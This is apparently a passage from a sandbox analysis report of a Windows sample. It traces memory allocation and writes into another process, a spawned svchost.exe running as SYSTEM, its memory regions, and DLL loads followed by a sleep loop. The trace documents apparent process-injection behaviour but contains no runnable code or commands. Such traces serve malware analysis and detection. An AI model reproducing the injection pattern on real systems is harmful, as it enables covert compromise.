BaseAddress=0x20010, Buffer=0x1f24bc*, NumberOfBytesToWrite=0x6e, NumberOfBytesWritten=0x18a5f8 | out: Buffer=0x1f24bc*, NumberOfBytesWritten=0x18a5f8*=0x6e) returned 0x0 [0222.179] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x2c2668, Buffer=0x18a6d0*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x18a6e0 | out: Buffer=0x18a6d0*, NumberOfBytesWritten=0x18a6e0*=0x10) returned 0x0 [0222.179] NtReadVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x60000, Buffer=0x18a5a8, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x18a618 | out: Buffer=0x18a5a8*, NumberOfBytesRead=0x18a618*=0x48) returned 0x0 [0222.179] NtAllocateVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x18a578*=0x0, ZeroBits=0x0, RegionSize=0x18a528*=0x10, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x18a578*=0x70000, RegionSize=0x18a528*=0x1000) returned 0x0 [0222.180] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x70000, Buffer=0x18a598*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x18a580 | out: Buffer=0x18a598*, NumberOfBytesWritten=0x18a580*=0x10) returned 0x0 [0222.180] NtWriteVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x60000, Buffer=0x18a5a8*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x18a628 | out: Buffer=0x18a5a8*, NumberOfBytesWritten=0x18a628*=0x48) returned 0x0 [0222.180] NtClearEvent (EventHandle=0x11c) returned 0x0 [0222.180] NtSignalAndWaitForSingleObject (SignalObject=0x118, WaitObject=0x11c, Alertable=0, Time=0x0) returned 0x0 [0222.185] NtReadVirtualMemory (in: ProcessHandle=0xfc, BaseAddress=0x60000, Buffer=0x18a5a8, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x18a630 | out: Buffer=0x18a5a8*, NumberOfBytesRead=0x18a630*=0x48) returned 0x0 [0222.185] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x18a778*=0x3d0000, RegionSize=0x18a768, FreeType=0x8000) returned 0x0 [0222.185] NtClose (Handle=0x118) returned 0x0 [0222.185] NtClose (Handle=0x11c) returned 0x0 [0222.185] CloseHandle (hObject=0xfc) returned 1 [0222.186] CloseHandle (hObject=0xec) returned 1 [0222.186] ExitProcess (uExitCode=0x0) Thread: id = 369 os_tid = 0x274 Process: id = "38" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x388aa000" os_pid = "0x55c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "37" os_parent_pid = "0x354" cmd_line = "C:\\Windows\\system32\\svchost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d2d7" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 4748 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4749 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4750 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4751 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4752 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 4753 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4754 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4755 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4756 start_va = 0x7fffe000 end_va = 0x7fffefff entry_point = 0x0 region_type = private name = "private_0x000000007fffe000" filename = "" Region: id = 4757 start_va = 0xffaa0000 end_va = 0xffaaafff entry_point = 0xffaa0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 4758 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4759 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4760 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 4761 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4762 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4763 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 4764 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4765 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4766 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4767 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4768 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 4769 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 4770 start_va = 0x10000000 end_va = 0x1001ffff entry_point = 0x0 region_type = private name = "private_0x0000000010000000" filename = "" Region: id = 4771 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4772 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4773 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4774 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4775 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4781 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4782 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 4783 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4784 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4785 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4786 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4787 start_va = 0x80000 end_va = 0xa8fff entry_point = 0x80000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4788 start_va = 0x4c0000 end_va = 0x647fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 4789 start_va = 0x80000 end_va = 0xa8fff entry_point = 0x80000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4790 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4791 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4792 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 4793 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 4794 start_va = 0x1a0000 end_va = 0x25ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4795 start_va = 0x650000 end_va = 0x7d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 4796 start_va = 0x7fefc8d0000 end_va = 0x7fefc8edfff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4797 start_va = 0x7fefd530000 end_va = 0x7fefd53efff entry_point = 0x7fefd530000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4798 start_va = 0x7fefb000000 end_va = 0x7fefb026fff entry_point = 0x7fefb000000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4799 start_va = 0x7fefde40000 end_va = 0x7fefde47fff entry_point = 0x7fefde40000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4800 start_va = 0x7fefaff0000 end_va = 0x7fefaffafff entry_point = 0x7fefaff0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4801 start_va = 0x7fefde50000 end_va = 0x7fefebd7fff entry_point = 0x7fefde50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4802 start_va = 0x7fefdcf0000 end_va = 0x7fefdd60fff entry_point = 0x7fefdcf0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4803 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4804 start_va = 0x7fefcf90000 end_va = 0x7fefcfb1fff entry_point = 0x7fefcf90000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4805 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4806 start_va = 0x7fef6230000 end_va = 0x7fef62a0fff entry_point = 0x7fef6230000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4807 start_va = 0x7fef61c0000 end_va = 0x7fef6223fff entry_point = 0x7fef61c0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 4808 start_va = 0x7fefcfc0000 end_va = 0x7fefd00dfff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4809 start_va = 0x7fefd5d0000 end_va = 0x7fefd5defff entry_point = 0x7fefd5d0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4810 start_va = 0x7fefd750000 end_va = 0x7fefd8b6fff entry_point = 0x7fefd750000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4811 start_va = 0x7fefd900000 end_va = 0x7fefd94cfff entry_point = 0x7fefd900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4812 start_va = 0x7e0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 4813 start_va = 0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4814 start_va = 0x7e0000 end_va = 0x85cfff entry_point = 0x7e0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4815 start_va = 0x860000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 4816 start_va = 0x7e0000 end_va = 0x85cfff entry_point = 0x7e0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4817 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4818 start_va = 0x950000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 4819 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 4820 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 4821 start_va = 0x7feff5b0000 end_va = 0x7feff648fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4822 start_va = 0x260000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 4823 start_va = 0x7fefb290000 end_va = 0x7fefb3b6fff entry_point = 0x7fefb290000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 4824 start_va = 0x7fefd3f0000 end_va = 0x7fefd414fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4825 start_va = 0x9d0000 end_va = 0xc9efff entry_point = 0x9d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4826 start_va = 0x270000 end_va = 0x271fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 4827 start_va = 0x270000 end_va = 0x276fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 4828 start_va = 0x280000 end_va = 0x281fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 4829 start_va = 0xca0000 end_va = 0xd5ffff entry_point = 0xca0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4830 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4831 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4832 start_va = 0x7fefca20000 end_va = 0x7fefca29fff entry_point = 0x7fefca20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 4833 start_va = 0x7fefad50000 end_va = 0x7fefad67fff entry_point = 0x7fefad50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4834 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4835 start_va = 0x7e0000 end_va = 0x824fff entry_point = 0x7e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4836 start_va = 0x7e0000 end_va = 0x824fff entry_point = 0x7e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4837 start_va = 0x7e0000 end_va = 0x824fff entry_point = 0x7e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4838 start_va = 0x7e0000 end_va = 0x824fff entry_point = 0x7e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4839 start_va = 0x7e0000 end_va = 0x824fff entry_point = 0x7e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4840 start_va = 0x7fefcb20000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4841 start_va = 0xde0000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 4842 start_va = 0xf20000 end_va = 0x101ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 4843 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 4844 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 4845 start_va = 0x7fefca60000 end_va = 0x7fefcaabfff entry_point = 0x7fefca60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4846 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4847 start_va = 0x1020000 end_va = 0x1820fff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 4848 start_va = 0x1830000 end_va = 0x2030fff entry_point = 0x0 region_type = private name = "private_0x0000000001830000" filename = "" Region: id = 4849 start_va = 0x7e0000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 4850 start_va = 0x7fefcdc0000 end_va = 0x7fefce14fff entry_point = 0x7fefcdc0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4851 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 4852 start_va = 0x2040000 end_va = 0x216ffff entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 4853 start_va = 0x7fefc7c0000 end_va = 0x7fefc7c6fff entry_point = 0x7fefc7c0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 4854 start_va = 0x7fefcc40000 end_va = 0x7fefcc9afff entry_point = 0x7fefcc40000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4855 start_va = 0x2170000 end_va = 0x222ffff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Thread: id = 370 os_tid = 0x358 [0222.171] NtClearEvent (EventHandle=0x8) returned 0x0 [0222.171] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0222.180] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x12fd80) returned 0x102 [0222.180] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="USER32.dll", BaseAddress=0x12ec50 | out: BaseAddress=0x12ec50*=0x774e0000) returned 0x0 [0222.203] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="USERENV.dll", BaseAddress=0x12ec50 | out: BaseAddress=0x12ec50*=0x7fefc8d0000) returned 0x0 [0222.206] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="IPHLPAPI.DLL", BaseAddress=0x12ec50 | out: BaseAddress=0x12ec50*=0x7fefb000000) returned 0x0 [0222.208] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="SHELL32.dll", BaseAddress=0x12ec50 | out: BaseAddress=0x12ec50*=0x7fefde50000) returned 0x0 [0222.215] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ole32.dll", BaseAddress=0x12ec50 | out: BaseAddress=0x12ec50*=0x7fefee70000) returned 0x0 [0222.219] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="bcrypt.dll", BaseAddress=0x12ec50 | out: BaseAddress=0x12ec50*=0x7fefcf90000) returned 0x0 [0222.220] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ADVAPI32.dll", BaseAddress=0x12ec50 | out: BaseAddress=0x12ec50*=0x7fefed90000) returned 0x0 [0222.223] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WINHTTP.dll", BaseAddress=0x12ec50 | out: BaseAddress=0x12ec50*=0x7fef6230000) returned 0x0 [0222.225] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ncrypt.dll", BaseAddress=0x12ec50 | out: BaseAddress=0x12ec50*=0x7fefcfc0000) returned 0x0 [0222.227] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="SHLWAPI.dll", BaseAddress=0x12ec50 | out: BaseAddress=0x12ec50*=0x7fefdcf0000) returned 0x0 [0222.227] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="CRYPT32.dll", BaseAddress=0x12ec50 | out: BaseAddress=0x12ec50*=0x7fefd750000) returned 0x0 [0222.230] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WS2_32.dll", BaseAddress=0x12ec50 | out: BaseAddress=0x12ec50*=0x7fefd900000) returned 0x0 [0222.231] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="OLEAUT32.dll", BaseAddress=0x12ec50 | out: BaseAddress=0x12ec50*=0x7feff380000) returned 0x0 [0222.233] Sleep (dwMilliseconds=0x1) [0222.248] GetLastError () returned 0xcb [0222.248] Sleep (dwMilliseconds=0x1) [0222.263] GetLastError () returned 0xcb [0222.263] Sleep (dwMilliseconds=0x1) [0222.278] GetLastError () returned 0xcb [0222.278] Sleep (dwMilliseconds=0x1) [0222.294] GetLastError () returned 0xcb [0222.294] Sleep (dwMilliseconds=0x1) [0222.310] GetLastError () returned 0xcb [0222.310] Sleep (dwMilliseconds=0x1) [0222.325] GetLastError () returned 0xcb [0222.325] Sleep (dwMilliseconds=0x1) [0222.343] GetLastError () returned 0xcb [0222.343] Sleep (dwMilliseconds=0x1) [0222.356] GetLastError () returned 0xcb [0222.356] Sleep (dwMilliseconds=0x1) [0222.372] GetLastError () returned 0xcb [0222.372] Sleep (dwMilliseconds=0x1) [0222.388] GetLastError () returned 0xcb [0222.388] Sleep (dwMilliseconds=0x1) [0222.403] GetLastError () returned 0xcb [0222.403] Sleep (dwMilliseconds=0x1) [0222.419] GetLastError () returned 0xcb [0222.419] Sleep (dwMilliseconds=0x1) [0222.434] GetLastError () returned 0xcb [0222.434] Sleep (dwMilliseconds=0x1) [0222.450] GetLastError () returned 0xcb [0222.450] Sleep (dwMilliseconds=0x1) [0222.466] GetLastError () returned 0xcb [0222.466] Sleep (dwMilliseconds=0x1) [0222.481] GetLastError () returned 0xcb [0222.481] Sleep (dwMilliseconds=0x1) [0222.497] GetLastError () returned 0xcb [0222.497] Sleep (dwMilliseconds=0x1) [0222.513] GetLastError () returned 0xcb [0222.513] Sleep (dwMilliseconds=0x1) [0222.528] GetLastError () returned 0xcb [0222.528] Sleep (dwMilliseconds=0x1) [0222.544] GetLastError () returned 0xcb [0222.544] Sleep (dwMilliseconds=0x1) [0222.560] GetLastError () returned 0xcb [0222.560] Sleep (dwMilliseconds=0x1) [0222.575] GetLastError () returned 0xcb [0222.575] Sleep (dwMilliseconds=0x1) [0222.591] GetLastError () returned 0xcb [0222.591] Sleep (dwMilliseconds=0x1) [0222.606] GetLastError () returned 0xcb [0222.606] Sleep (dwMilliseconds=0x1) [0222.622] GetLastError () returned 0xcb [0222.622] Sleep (dwMilliseconds=0x1) [0222.637] GetLastError () returned 0xcb [0222.637] Sleep (dwMilliseconds=0x1) [0222.653] GetLastError () returned 0xcb [0222.653] Sleep (dwMilliseconds=0x1) [0222.668] GetLastError () returned 0xcb [0222.668] Sleep (dwMilliseconds=0x1) [0222.684] GetLastError () returned 0xcb [0222.684] Sleep (dwMilliseconds=0x1) [0222.706] GetLastError () returned 0xcb [0222.706] Sleep (dwMilliseconds=0x1) 